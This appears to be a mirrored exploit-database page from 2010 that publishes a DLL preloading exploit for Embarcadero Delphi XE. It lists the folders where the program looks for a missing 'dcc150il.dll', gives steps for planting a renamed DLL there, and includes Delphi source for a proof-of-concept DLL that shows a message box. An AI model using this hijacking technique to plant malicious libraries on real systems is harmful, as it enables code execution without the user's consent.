Home / os / win7

[local exploits] - Embarcadero Delphi XE (2011) DLL preloadi

Posted on 25 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Embarcadero Delphi XE (2011) DLL preloading exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 25 Sep 2010 | Exploit category: local exploits | Exploit author: STRELiTZIA | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===================================================
Embarcadero Delphi XE (2011) DLL preloading exploit
===================================================

Exploit Title  : [Embarcadero Delphi XE (2011), DLL preloading exploit]
Author         : [STRELiTZIA]
Software       : [Delphi XE (2011)]
Tested on      : [Windows Xp SP3]
	
============================
=       Description        = 
============================
Delphi XE, searchs and laods INEXISTENT &quot;dcc150il.dll&quot; library without checks, or any visual warning messages related to library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.
 
 
============================
=       Instructions       =
============================
Default searching folders:
%C%:Program FilesEmbarcaderoRAD Studio8.0indcc150il.dll
%C%:WINDOWSsystem32dcc150il.dll
%C%:WINDOWSsystemdcc150il.dll
%C%:WINDOWSdcc150il.dll
%C%:Documents and Settings\%User%\%My documents%RAD StudioProjectsdcc150il.dll
%C%:Documents and SettingsAll UsersDocumentsRAD Studio8.0BPLdcc150il.dll
%C%:WINDOWSsystem32wbemdcc150il.dll

1- Copy &quot;Test.dll&quot; into &quot;One of listed folders&quot;
2- Rename &quot;Test.dll&quot; to &quot;dcc150il.dll&quot;

============================
=          Tests           =
============================
- Launch Embarcadero Delphi XE.
- File -&gt;&gt; New -&gt;&gt; VCL Forms application - Delphi.
	
============================
= Test Dll Source &quot;Delphi&quot; =
============================
Library Test;
uses
  Windows;

begin
  MessageBoxA
    (
    0,
    PChar(&#039;Yep, I&#039;&#039;m running in your system without your permission.&#039;),
	PChar(&#039;Sample&#039;),
    MB_ICONSTOP
    );
end.


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-25]</pre></body></html>

 

TOP

Malware :

Exploits :